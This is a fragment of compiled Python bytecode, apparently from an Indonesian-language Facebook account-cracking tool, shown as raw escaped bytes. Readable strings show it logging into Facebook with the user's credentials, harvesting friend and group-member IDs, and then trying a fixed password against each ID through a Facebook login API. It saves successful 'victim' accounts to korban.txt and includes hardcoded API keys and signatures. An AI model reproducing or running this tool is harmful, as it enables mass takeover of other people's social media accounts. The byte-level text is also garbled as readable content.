ID yang anda masukan tidak ditemukani\x02\x00\x00\x00s/\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mNama grup \x1b[1;97m: \x1b[4m%s\x1b[0ms\x1a\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mEnter...(\x0e\x00\x00\x00R9\x00\x00\x00R\x10\x00\x00\x00t\x08\x00\x00\x00id_groupR?\x00\x00\x00RQ\x00\x00\x00R]\x00\x00\x00R^\x00\x00\x00t\x05\x00\x00\x00splitR@\x00\x00\x00RX\x00\x00\x00RH\x00\x00\x00R7\x00\x00\x00R\x07\x00\x00\x00Re\x00\x00\x00(\x04\x00\x00\x00R*\x00\x00\x00t\x04\x00\x00\x00namat\x04\x00\x00\x00nextRI\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<seni>t\x10\x00\x00\x00saring_id_group03\x01\x00\x00s$\x00\x00\x00\x00\x02\x03\x01\x07\x01\x0c\x01\x05\x01\x14\x01)\x01\x03\x01\x15\x01\x05\x01\x03\x01\x05\x01\n\x01\x0b\x01\t\x01\x0c\x01\n\x01\n\x01c\x00\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00C\x00\x00\x00s\x91\x00\x00\x00t\x00\x00d\x01\x00k\x03\x00r3\x00t\x01\x00\x83\x00\x00\x01t\x02\x00\x83\x00\x00\x01t\x00\x00d\x02\x00k\x02\x00r3\x00t\x03\x00\x83\x00\x00\x01q3\x00n\x00\x00t\x04\x00\x83\x00\x00}\x00\x00xG\x00t\x05\x00t\x06\x00|\x00\x00\x83\x01\x00\x83\x01\x00\x01y\x19\x00t\x07\x00j\x08\x00d\x03\x00d\x04\x00\x83\x00\x01j\t\x00}\x00\x00Wq?\x00\x01\x01\x01d\x05\x00t\n\x00t\x0b\x00\x83\x01\x00\x16GHPq?\x00Xq?\x00Wt\x0c\x00\x83\x00\x00\x01d\x00\x00S(\x06\x00\x00\x00Ni\x01\x00\x00\x00i\x00\x00\x00\x00Rg\x00\x00\x00s\x16\x00\x00\x00/browse/group/members/s:\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mHanya Bisa Mengambil \x1b[1;97m%d \x1b[1;92mID(\r\x00\x00\x00RE\x00\x00\x00R\x17\x00\x00\x00RL\x00\x00\x00R\x16\x00\x00\x00Rl\x00\x00\x00Re\x00\x00\x00R?\x00\x00\x00R@\x00\x00\x00RX\x00\x00\x00RH\x00\x00\x00R\x0c\x00\x00\x00RN\x00\x00\x00RT\x00\x00\x00(\x01\x00\x00\x00Rk\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<seni>R.\x00\x00\x00G\x01\x00\x00s\x1c\x00\x00\x00\x00\x01\x0c\x01\x07\x01\x07\x01\x0c\x01\r\x01\t\x01\x03\x01\x10\x01\x03\x01\x19\x01\x03\x01\x0f\x01\t\x01t\x02\x00\x00\x00mtc\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00B\x00\x00\x00s#\x00\x00\x00e\x00\x00Z\x01\x00d\x00\x00\x84\x00\x00Z\x02\x00d\x01\x00\x84\x00\x00Z\x03\x00d\x02\x00\x84\x00\x00Z\x04\x00RS(\x03\x00\x00\x00c\x03\x00\x00\x00\x03\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00s/\x00\x00\x00t\x00\x00j\x01\x00j\x02\x00|\x00\x00\x83\x01\x00\x01|\x01\x00|\x00\x00_\x03\x00d\x01\x00|\x00\x00_\x04\x00|\x02\x00|\x00\x00_\x05\x00d\x00\x00S(\x02\x00\x00\x00Ni\x03\x00\x00\x00(\x06\x00\x00\x00t\t\x00\x00\x00threadingt\x06\x00\x00\x00Threadt\x08\x00\x00\x00__init__R\x1a\x00\x00\x00R*\x00\x00\x00t\x01\x00\x00\x00p(\x03\x00\x00\x00t\x04\x00\x00\x00selfRd\x00\x00\x00Rq\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<seni>Rp\x00\x00\x00W\x01\x00\x00s\x08\x00\x00\x00\x00\x01\x10\x01\t\x01\t\x01c\x01\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00s\x10\x00\x00\x00|\x00\x00j\x00\x00|\x00\x00j\x01\x00f\x02\x00S(\x01\x00\x00\x00N(\x02\x00\x00\x00R*\x00\x00\x00R\x1a\x00\x00\x00(\x01\x00\x00\x00Rr\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<seni>t\x06\x00\x00\x00update\\\x01\x00\x00s\x02\x00\x00\x00\x00\x01c\x01\x00\x00\x00\x02\x00\x00\x00\n\x00\x00\x00C\x00\x00\x00s\xde\x00\x00\x00yO\x00t\x00\x00j\x01\x00t\x00\x00j\x02\x00d\x01\x00d\x02\x00d\x03\x00t\x03\x00j\x04\x00i\x02\x00|\x00\x00j\x05\x00d\x04\x006|\x00\x00j\x06\x00d\x05\x006\x83\x01\x00d\x06\x00i\x01\x00d\x07\x00d\x08\x006\x83\x00\x03\x83\x01\x00}\x01\x00Wn:\x00\x04t\x07\x00k\n\x00ro\x00\x01\x01\x01t\x08\x00j\t\x00j\n\x00\x83\x00\x00\x01n\x1d\x00\x01\x01\x01d\t\x00|\x00\x00_\x0b\x00t\x08\x00j\t\x00j\n\x00\x83\x00\x00\x01n\x01\x00Xd\n\x00|\x01\x00j\
x0c\x00k\x06\x00s\xaa\x00d\x0b\x00|\x01\x00j\x0c\x00k\x06\x00r\xb6\x00d\x0c\x00|\x00\x00_\x0b\x00n$\x00d\r\x00|\x01\x00j\x0c\x00k\x06\x00r\xd1\x00d\x0e\x00|\x00\x00_\x0b\x00n\t\x00d\x0f\x00|\x00\x00_\x0b\x00d\x00\x00S(\x10\x00\x00\x00NRH\x00\x00\x00s \x00\x00\x00https://m.facebook.com/login.phpt\x04\x00\x00\x00dataR;\x00\x00\x00R<\x00\x00\x00t\x07\x00\x00\x00headerssR\x00\x00\x00Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16s\n\x00\x00\x00User-Agenti\x08\x00\x00\x00R=\x00\x00\x00s\x0b\x00\x00\x00save-devicei\x01\x00\x00\x00R>\x00\x00\x00i\x02\x00\x00\x00i\x00\x00\x00\x00(\r\x00\x00\x00t\x07\x00\x00\x00urllib2t\x07\x00\x00\x00urlopent\x07\x00\x00\x00Requestt\x06\x00\x00\x00urllibt\t\x00\x00\x00urlencodeR\x1a\x00\x00\x00Rq\x00\x00\x00t\x11\x00\x00\x00KeyboardInterruptR\x08\x00\x00\x00R\t\x00\x00\x00R\n\x00\x00\x00R*\x00\x00\x00RH\x00\x00\x00(\x02\x00\x00\x00Rr\x00\x00\x00Rt\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<seni>t\x03\x00\x00\x00run^\x01\x00\x00s\x18\x00\x00\x00\x00\x01\x03\x01O\x01\r\x01\x10\x01\x03\x01\t\x01\x11\x01\x1e\x01\x0c\x01\x0f\x01\x0c\x02(\x05\x00\x00\x00t\x08\x00\x00\x00__name__t\n\x00\x00\x00__module__Rp\x00\x00\x00Rs\x00\x00\x00R|\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<seni>Rm\x00\x00\x00V\x01\x00\x00s\x06\x00\x00\x00\x06\x01\t\x05\t\x02c\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00C\x00\x00\x00s!\x00\x00\x00t\x00\x00\x83\x00\x00\x01d\x01\x00GHd\x02\x00GHd\x03\x00GHt\x01\x00\x83\x00\x00\x01d\x00\x00S(\x04\x00\x00\x00Ns/\x00\x00\x00\x1b[1;91m[\x1b[1;97m1.\x1b[1;91m] \x1b[1;92mCrack ID Temans9\x00\x00\x00\x1b[1;91m[\x1b[1;97m2.\x1b[1;91m] \x1b[1;92mCrack ID teman dari grups!\x00\x00\x00\x1b[1;91m[\x1b[1;97m3.\x1b[1;91m] Kembali(\x02\x00\x00\x00Ra\x00\x00\x00t\x06\x00\x00\x00pilihg(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<seni>R/\x00\x00\x00n\x01\x00\x00s\n\x00\x00\x00\x00\x01\x07\x01\x05\x01\x05\x01\x05\x01c\x00\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s^\x00\x00\x00t\x00\x00d\x01\x00d\x02\x00d\x03\x00d\x04\x00g\x03\x00\x83\x02\x00}\x00\x00|\x00\x00d\x02\x00k\x02\x00r.\x00t\x01\x00\x83\x00\x00\x01n,\x00|\x00\x00d\x03\x00k\x02\x00rD\x00t\x02\x00\x83\x00\x00\x01n\x16\x00|\x00\x00d\x04\x00k\x02\x00rZ\x00t\x03\x00\x83\x00\x00\x01n\x00\x00d\x00\x00S(\x05\x00\x00\x00Ns)\x00\x00\x00\n\x1b[1;91mmbfz\x1b[1;97m/\x1b[1;91mcrack\x1b[1;97m> 
i\x01\x00\x00\x00i\x02\x00\x00\x00i\x03\x00\x00\x00(\x04\x00\x00\x00R\x14\x00\x00\x00t\x08\x00\x00\x00ayocrackt\t\x00\x00\x00ayocrackgR\x16\x00\x00\x00(\x01\x00\x00\x00t\x07\x00\x00\x00karjok2(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<seni>R\x7f\x00\x00\x00t\x01\x00\x00s\x0e\x00\x00\x00\x00\x01\x18\x01\x0c\x01\n\x01\x0c\x01\n\x01\x0c\x01c\x01\x00\x00\x00\x07\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s\x1e\x01\x00\x00t\x00\x00d\x01\x00d\x02\x00\x83\x02\x00}\x01\x00yq\x00t\x01\x00j\x02\x00d\x03\x00d\x04\x00|\x00\x00\x83\x01\x01}\x02\x00t\x03\x00j\x04\x00|\x02\x00j\x05\x00\x83\x01\x00}\x03\x00|\x01\x00j\x06\x00|\x03\x00d\x05\x00\x19\x83\x01\x00\x01|\x01\x00j\x07\x00\x83\x00\x00\x01d\x06\x00GHd\x07\x00d\x08\x00\x14GHt\x08\x00d\t\x00\x83\x01\x00}\x04\x00t\t\x00d\n\x00\x83\x01\x00\x01t\n\x00\x83\x00\x00\x01Wn\x97\x00\x04t\x0b\x00k\n\x00r\xe1\x00\x01\x01\x01d\x0b\x00GHt\t\x00d\x0c\x00\x83\x01\x00\x01t\x08\x00d\r\x00\x83\x01\x00}\x05\x00|\x05\x00d\x0e\x00k\x02\x00r\xc1\x00t\x0c\x00\x83\x00\x00\x01q\x1a\x01|\x05\x00d\x0f\x00k\x02\x00r\xd7\x00t\n\x00\x83\x00\x00\x01q\x1a\x01t\r\x00\x83\x00\x00\x01n9\x00\x04t\x01\x00j\x0e\x00j\x0f\x00k\n\x00r\x19\x01\x01\x01\x01d\x10\x00GHt\t\x00d\x0c\x00\x83\x01\x00\x01t\x08\x00d\x11\x00\x83\x01\x00}\x06\x00t\n\x00\x83\x00\x00\x01n\x01\x00Xd\x00\x00S(\x12\x00\x00\x00Ns\t\x00\x00\x00login.txtRM\x00\x00\x00s\'\x00\x00\x00https://api.facebook.com/restserver.phpt\x06\x00\x00\x00paramst\x0c\x00\x00\x00access_tokens!\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mLogin berhasil.i2\x00\x00\x00s\x08\x00\x00\x00\x1b[1;97m=s\x1a\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mEnter...i\x01\x00\x00\x00s\x16\x00\x00\x00\x1b[1;91m[X] Login GAGALi\x02\x00\x00\x00s$\x00\x00\x00\x1b[1;91m[?] \x1b[1;92mCoba lagi ? (y/t) t\x01\x00\x00\x00yR\x12\x00\x00\x00s\x18\x00\x00\x00\x1b[1;91m[!] Koneksi Errors!\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m](\x10\x00\x00\x00R\x1b\x00\x00\x00R\x1d\x00\x00\x00R\x1e\x00\x00\x00R\x1f\x00\x00\x00R \x00\x00\x00R!\x00\x00\x00RP\x00\x00\x00t\x05\x00\x00\x00closeR\x07\x00\x00\x00R7\x00\x00\x00R,\x00\x00\x00R\'\x00\x00\x00R)\x00\x00\x00R\x16\x00\x00\x00t\n\x00\x00\x00exceptionst\x0f\x00\x00\x00ConnectionError(\x07\x00\x00\x00Rt\x00\x00\x00t\x01\x00\x00\x00bR\x18\x00\x00\x00R*\x00\x00\x00RI\x00\x00\x00t\x06\x00\x00\x00tanya1t\x07\x00\x00\x00inputki(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<seni>R\x1e\x00\x00\x00}\x01\x00\x00s2\x00\x00\x00\x00\x01\x0f\x01\x03\x01\x15\x01\x12\x01\x11\x01\n\x01\x05\x01\t\x01\x0c\x01\n\x01\x0b\x01\r\x01\x05\x01\n\x01\x0c\x01\x0c\x01\n\x01\x0c\x01\n\x02\n\x01\x13\x01\x05\x01\n\x01\x0c\x01c\x00\x00\x00\x00\x06\x00\x00\x00\x04\x00\x00\x00C\x00\x00\x00s\xea\x00\x00\x00t\x00\x00\x83\x00\x00\x01d\x01\x00GHt\x01\x00d\x02\x00\x83\x01\x00}\x00\x00t\x01\x00d\x03\x00\x83\x01\x00}\x01\x00d\x04\x00GHt\x02\x00d\x05\x00\x83\x01\x00\x01d\x06\x00}\x02\x00i\x0b\x00d\x07\x00d\x08\x006d\t\x00d\n\x006|\x00\x00d\x0b\x006d\x0c\x00d\r\x006d\x0e\x00d\x0f\x006d\x0e\x00d\x10\x006d\x11\x00d\x12\x006d\x13\x00d\x14\x006|\x01\x00d\t\x006d\x15\x00d\x16\x006d\x17\x00d\x18\x006}\x03\x00d\x19\x00|\x00\x00\x17d\x1a\x00\x17|\x01\x00\x17d\x1b\x00\x17|\x02\x00\x17}\x04\x00t\x03\x00j\x04\x00d\x1c\x00\x83\x01\x00}\x05\x00|\x05\x00j\x05\x00|\x04\x00\x83\x01\x00\x01|\x03\x00j\x05\x00i\x01\x00|\x05\x00j\x06\x00\x83\x00\x00d\x1d\x006\x83\x01\x00\x01t\x07\x00|\x03\x00\x83\x01\x00\x01d\x00\x00S(\x1e\x00\x00\x00Ns.\x00\x00\x00\x1b[1;91m[!] 
\x1b[1;92mLOGIN AKUN FACEBOOK s+\x00\x00\x00\x1b[1;91m[+] \x1b[1;36mUsername \x1b[1;91m:\x1b[1;92m s+\x00\x00\x00\x1b[1;91m[+] \x1b[1;36mPassword \x1b[1;91m:\x1b[1;92m s!\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mSedang Masuk...i\x02\x00\x00\x00t \x00\x00\x0062f8ce9f74b12f84c123cc23437a4a32t \x00\x00\x00882a8490361da98702bf97a021ddc14dt\x07\x00\x00\x00api_keyt\x08\x00\x00\x00passwordt\x10\x00\x00\x00credentials_typeR;\x00\x00\x00t\x04\x00\x00\x00JSONt\x06\x00\x00\x00formatt\x01\x00\x00\x001t\x13\x00\x00\x00generate_machine_idt\x18\x00\x00\x00generate_session_cookiest\x05\x00\x00\x00en_USt\x06\x00\x00\x00locales\n\x00\x00\x00auth.logint\x06\x00\x00\x00methodt\x01\x00\x00\x000t\x14\x00\x00\x00return_ssl_resourcess\x03\x00\x00\x001.0t\x01\x00\x00\x00vsG\x00\x00\x00api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail=s`\x00\x00\x00format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword=s\x1b\x00\x00\x00return_ssl_resources=0v=1.0t\x03\x00\x00\x00md5t\x03\x00\x00\x00sig(\x08\x00\x00\x00Ra\x00\x00\x00R\x10\x00\x00\x00R7\x00\x00\x00t\x07\x00\x00\x00hashlibt\x03\x00\x00\x00newRs\x00\x00\x00t\t\x00\x00\x00hexdigestR\x1e\x00\x00\x00(\x06\x00\x00\x00R\x1a\x00\x00\x00t\x03\x00\x00\x00pwdt\n\x00\x00\x00API_SECRETRt\x00\x00\x00R\x9d\x00\x00\x00R\r\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<seni>R)\x00\x00\x00\x99\x01\x00\x00s\x1a\x00\x00\x00\x00\x01\x07\x01\x05\x01\x0c\x01\x0c\x01\x05\x01\n\x01\x06\x00S\x00\x1a\x01\x0f\x01\r\x02\x1a\x01c\x00\x00\x00\x00\x0c\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s\x92\x01\x00\x00y\x19\x00t\x00\x00d\x01\x00d\x02\x00\x83\x02\x00j\x01\x00\x83\x00\x00}\x00\x00Wn7\x00\x04t\x02\x00k\n\x00rR\x00\x01\x01\x01d\x03\x00d\x04\x00\x14GHd\x05\x00GHd\x06\x00GHt\x03\x00d\x07\x00\x83\x01\x00}\x01\x00t\x04\x00\x83\x00\x00\x01n\x01\x00Xt\x05\x00\x83\x00\x00\x01d\x08\x00GHt\x06\x00d\t\x00\x83\x01\x00\x01t\x07\x00j\x08\x00d\n\x00|\x00\x00\x17\x83\x01\x00}\x02\x00t\t\x00j\n\x00|\x02\x00\x83\x01\x00}\x03\x00g\x00\x00}\x04\x00x-\x00|\x03\x00d\x0b\x00\x19d\x0c\x00\x19D]\x1d\x00}\x05\x00|\x05\x00d\r\x00\x19}\x06\x00|\x04\x00j\x0b\x00|\x06\x00\x83\x01\x00\x01q\xa0\x00Wx\x8a\x00|\x04\x00D]\x82\x00}\x07\x00t\x00\x00d\x0e\x00d\x0f\x00\x83\x02\x00}\x08\x00|\x08\x00j\x0c\x00|\x07\x00d\x10\x00\x17\x83\x01\x00\x01t\x00\x00d\x0e\x00d\x02\x00\x83\x02\x00}\t\x00|\t\x00j\x01\x00\x83\x00\x00j\r\x00\x83\x00\x00}\n\x00t\x0e\x00j\x0f\x00j\x0c\x00d\x11\x00t\x10\x00t\x11\x00|\n\x00\x83\x01\x00\x83\x01\x00\x17d\x12\x00\x17\x83\x01\x00\x01t\x0e\x00j\x0f\x00j\x12\x00\x83\x00\x00\x01|\x08\x00j\x13\x00\x83\x00\x00\x01q\xc8\x00Wt\x06\x00d\x13\x00\x83\x01\x00\x01d\x14\x00GHd\x15\x00GHt\x06\x00d\x13\x00\x83\x01\x00\x01d\x16\x00GHt\x06\x00d\x13\x00\x83\x01\x00\x01t\x03\x00d\x07\x00\x83\x01\x00}\x0b\x00t\x04\x00\x83\x00\x00\x01d\x00\x00S(\x17\x00\x00\x00Ns\t\x00\x00\x00login.txtR\x18\x00\x00\x00i\x14\x00\x00\x00s\x08\x00\x00\x00\x1b[1;97m=s\x17\x00\x00\x00\x1b[1;91m[X] \x1b[1;92mErrors$\x00\x00\x00\x1b[1;91m[!] 
\x1b[1;92mPerlu Login dulu !s!\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]s"\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mCuri ID teman...i\x02\x00\x00\x00sF\x00\x00\x00https://graph.facebook.com/me?fields=friends.limit(5000)&access_token=t\x07\x00\x00\x00friendsRt\x00\x00\x00R\x1a\x00\x00\x00s\t\x00\x00\x00teman.txtR*\x00\x00\x00s\x01\x00\x00\x00\ns&\x00\x00\x00\r\x1b[1;91m[+] \x1b[1;92mMendapatkan \x1b[1;97ms\x11\x00\x00\x00 \x1b[1;92mID teman.i\x01\x00\x00\x00R\\\x00\x00\x00s\x1d\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mBerhasil ./s1\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mID tersimpan \x1b[1;97m*teman.txt*(\x14\x00\x00\x00R\x1b\x00\x00\x00R\x1c\x00\x00\x00R(\x00\x00\x00R\x07\x00\x00\x00R,\x00\x00\x00R\x17\x00\x00\x00R7\x00\x00\x00Ry\x00\x00\x00Rw\x00\x00\x00R\x1f\x00\x00\x00t\x04\x00\x00\x00loadR#\x00\x00\x00RP\x00\x00\x00Ri\x00\x00\x00R\t\x00\x00\x00Rb\x00\x00\x00t\x03\x00\x00\x00strR\x0c\x00\x00\x00Rc\x00\x00\x00R\x86\x00\x00\x00(\x0c\x00\x00\x00R)\x00\x00\x00t\t\x00\x00\x00inputmekiRH\x00\x00\x00t\x07\x00\x00\x00memekidt\x03\x00\x00\x00idsRd\x00\x00\x00R\x13\x00\x00\x00t\x04\x00\x00\x00zeddt\x06\x00\x00\x00bukaidt\x06\x00\x00\x00bacaidR\x9b\x00\x00\x00t\x06\x00\x00\x00input2(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<seni>R-\x00\x00\x00\xa7\x01\x00\x00sB\x00\x00\x00\x00\x01\x03\x01\x19\x01\r\x01\t\x01\x05\x01\x05\x01\x0c\x01\x0b\x01\x07\x01\x05\x01\n\x01\x13\x01\x0f\x01\x06\x01\x15\x01\n\x01\x11\x01\r\x01\x0f\x01\x11\x01\x0f\x01\x12\x01$\x01\r\x01\x0e\x01\n\x01\x05\x01\x05\x01\n\x01\x05\x01\n\x01\x0c\x01c\x00\x00\x00\x00\x06\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s\x8a\x01\x00\x00d\x01\x00a\x00\x00g\x00\x00a\x01\x00g\x00\x00a\x02\x00g\x00\x00a\x03\x00t\x04\x00d\x02\x00d\x03\x00\x83\x02\x00}\x00\x00|\x00\x00j\x05\x00\x83\x00\x00j\x06\x00\x83\x00\x00a\x07\x00xJ\x01t\x08\x00r\x85\x01t\x08\x00j\t\x00\x83\x00\x00j\n\x00\x83\x00\x00}\x01\x00d\x04\x00|\x01\x00\x17d\x05\x00\x17t\x0b\x00\x17d\x06\x00\x17}\x02\x00t\x0c\x00j\r\x00|\x02\x00\x83\x01\x00}\x03\x00t\x0e\x00j\x0f\x00|\x03\x00\x83\x01\x00}\x04\x00t\x00\x00t\x10\x00t\x07\x00\x83\x01\x00k\x02\x00r\x9e\x00Pn\x00\x00d\x07\x00|\x04\x00k\x06\x00r\xf6\x00t\x04\x00d\x08\x00d\t\x00\x83\x02\x00}\x05\x00|\x05\x00j\x11\x00|\x01\x00d\n\x00\x17\x83\x01\x00\x01|\x05\x00j\x12\x00\x83\x00\x00\x01t\x01\x00j\x13\x00|\x01\x00d\x0b\x00\x17t\x0b\x00\x17\x83\x01\x00\x01t\x00\x00d\x0c\x007a\x00\x00n\x00\x00d\r\x00|\x04\x00k\x06\x00s\x0e\x01d\x0e\x00|\x04\x00k\x06\x00r0\x01t\x02\x00j\x13\x00|\x01\x00d\x0f\x00\x17t\x0b\x00\x17\x83\x01\x00\x01t\x00\x00d\x0c\x007a\x00\x00n\x17\x00t\x03\x00j\x13\x00|\x01\x00\x83\x01\x00\x01t\x00\x00d\x0c\x007a\x00\x00t\x14\x00j\x15\x00j\x11\x00d\x10\x00t\x16\x00t\x00\x00\x83\x01\x00\x17d\x11\x00\x17t\x16\x00t\x10\x00t\x07\x00\x83\x01\x00\x83\x01\x00\x17\x83\x01\x00\x01t\x14\x00j\x15\x00j\x17\x00\x83\x00\x00\x01q<\x00Wd\x00\x00S(\x12\x00\x00\x00Ni\x00\x00\x00\x00s\t\x00\x00\x00teman.txtR\x18\x00\x00\x00s\x91\x00\x00\x00https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=s\x17\x00\x00\x00&locale=en_US&password=sH\x00\x00\x00&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6R\x84\x00\x00\x00s\n\x00\x00\x00korban.txtR*\x00\x00\x00s\x01\x00\x00\x00\ns\x1c\x00\x00\x00 | \x1b[1;92mPassword \x1b[1;97m: i\x01\x00\x00\x00s\x10\x00\x00\x00www.facebook.coms\x05\x00\x00\x00(403)s\x1c\x00\x00\x00 | \x1b[1;93mPassword \x1b[1;97m: s%\x00\x00\x00\r\x1b[1;91m[%] \x1b[1;92mCrack \x1b[1;97m: s\x03\x00\x00\x00 > 
(\x18\x00\x00\x00t\x02\x00\x00\x00lit\x08\x00\x00\x00berhasilt\x08\x00\x00\x00cekpointt\x05\x00\x00\x00gagalR\x1b\x00\x00\x00R\x1c\x00\x00\x00Ri\x00\x00\x00R\x9b\x00\x00\x00t\x04\x00\x00\x00filet\x08\x00\x00\x00readlinet\x05\x00\x00\x00stript\n\x00\x00\x00korbanpassRy\x00\x00\x00Rw\x00\x00\x00R\x1f\x00\x00\x00R\xa4\x00\x00\x00R\x0c\x00\x00\x00RP\x00\x00\x00R\x86\x00\x00\x00R#\x00\x00\x00R\t\x00\x00\x00Rb\x00\x00\x00R\xa5\x00\x00\x00Rc\x00\x00\x00(\x06\x00\x00\x00R\xab\x00\x00\x00t\x08\x00\x00\x00korbanidRH\x00\x00\x00Rt\x00\x00\x00t\x04\x00\x00\x00hehet\x06\x00\x00\x00bukaya(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<seni>t\x05\x00\x00\x00crack\xc9\x01\x00\x00s4\x00\x00\x00\x00\x02\x06\x01\x06\x01\x06\x01\x06\x01\x0f\x01\x12\x01\t\x01\x12\x01\x16\x01\x0f\x01\x0f\x01\x12\x02\x04\x01\x0c\x01\x0f\x01\x11\x01\n\x01\x15\x01\r\x02\x18\x01\x15\x01\r\x02\r\x01\n\x01.\x00c\x00\x00\x00\x00\x06\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s\x8a\x01\x00\x00d\x01\x00a\x00\x00g\x00\x00a\x01\x00g\x00\x00a\x02\x00g\x00\x00a\x03\x00t\x04\x00d\x02\x00d\x03\x00\x83\x02\x00}\x00\x00|\x00\x00j\x05\x00\x83\x00\x00j\x06\x00\x83\x00\x00a\x07\x00xJ\x01t\x08\x00r\x85\x01t\x08\x00j\t\x00\x83\x00\x00j\n\x00\x83\x00\x00}\x01\x00d\x04\x00|\x01\x00\x17d\x05\x00\x17t\x0b\x00\x17d\x06\x00\x17}\x02\x00t\x0c\x00j\r\x00|\x02\x00\x83\x01\x00}\x03\x00t\x0e\x00j\x0f\x00|\x03\x00\x83\x01\x00}\x04\x00t\x00\x00t\x10\x00t\x07\x00\x83\x01\x00k\x02\x00r\x9e\x00Pn\x00\x00d\x07\x00|\x04\x00k\x06\x00r\xf6\x00t\x04\x00d\x08\x00d\t\x00\x83\x02\x00}\x05\x00|\x05\x00j\x11\x00|\x01\x00d\n\x00\x17\x83\x01\x00\x01|\x05\x00j\x12\x00\x83\x00\x00\x01t\x01\x00j\x13\x00|\x01\x00d\x0b\x00\x17t\x0b\x00\x17\x83\x01\x00\x01t\x00\x00d\x0c\x007a\x00\x00n\x00\x00d\r\x00|\x04\x00k\x06\x00s\x0e\x01d\x0e\x00|\x04\x00k\x06\x00r0\x01t\x02\x00j\x13\x00|\x01\x00d\x0f\x00\x17t\x0b\x00\x17\x83\x01\x00\x01t\x00\x00d\x0c\x007a\x00\x00n\x17\x00t\x03\x00j\x13\x00|\x01\x00\x83\x01\x00\x01t\x00\x00d\x0c\x007a\x00\x00t\x14\x00j\x15\x00j\x11\x00d\x10\x00t\x16\x00t\x00\x00\x83\x01\x00\x17d\x11\x00\x17t\x16\x00t\x10\x00t\x07\x00\x83\x01\x00\x83\x01\x00\x17\x83\x01\x00\x01t\x14\x00j\x15\x00j\x17\x00\x83\x00\x00\x01q<\x00Wd\x00\x00S(\x12\x00\x00\x00Ni\x00\x00\x00\x00s\x0b\x00\x00\x00IDgroup.txtR\x18\x00\x00\x00s\x91\x00\x00\x00https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=s\x17\x00\x00\x00&locale=en_US&password=sH\x00\x00\x00&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6R\x84\x00\x00\x00s\x0b\x00\x00\x00korbang.txtR*\x00\x00\x00s\x01\x00\x00\x00\ns\x1c\x00\x00\x00 | \x1b[1;92mPassword \x1b[1;97m: i\x01\x00\x00\x00s\x10\x00\x00\x00www.facebook.coms\x05\x00\x00\x00(403)s\x1c\x00\x00\x00 | \x1b[1;93mPassword \x1b[1;97m: s%\x00\x00\x00\r\x1b[1;91m[%] \x1b[1;92mCrack \x1b[1;97m: s\x03\x00\x00\x00 > 
(\x18\x00\x00\x00R\xad\x00\x00\x00R\xae\x00\x00\x00R\xaf\x00\x00\x00R\xb0\x00\x00\x00R\x1b\x00\x00\x00R\x1c\x00\x00\x00Ri\x00\x00\x00R\x9b\x00\x00\x00R\xb1\x00\x00\x00R\xb2\x00\x00\x00R\xb3\x00\x00\x00t\x0b\x00\x00\x00korbanpass1Ry\x00\x00\x00Rw\x00\x00\x00R\x1f\x00\x00\x00R\xa4\x00\x00\x00R\x0c\x00\x00\x00RP\x00\x00\x00R\x86\x00\x00\x00R#\x00\x00\x00R\t\x00\x00\x00Rb\x00\x00\x00R\xa5\x00\x00\x00Rc\x00\x00\x00(\x06\x00\x00\x00R\xab\x00\x00\x00t\t\x00\x00\x00korbanidgRH\x00\x00\x00Rt\x00\x00\x00R\xb6\x00\x00\x00R\xb7\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<seni>t\x06\x00\x00\x00crackg\xe8\x01\x00\x00s4\x00\x00\x00\x00\x02\x06\x01\x06\x01\x06\x01\x06\x01\x0f\x01\x12\x01\t\x01\x12\x01\x16\x01\x0f\x01\x0f\x01\x12\x02\x04\x01\x0c\x01\x0f\x01\x11\x01\n\x01\x15\x01\r\x02\x18\x01\x15\x01\r\x02\r\x01\n\x01.\x00c\x00\x00\x00\x00\x02\x00\x00\x00\x05\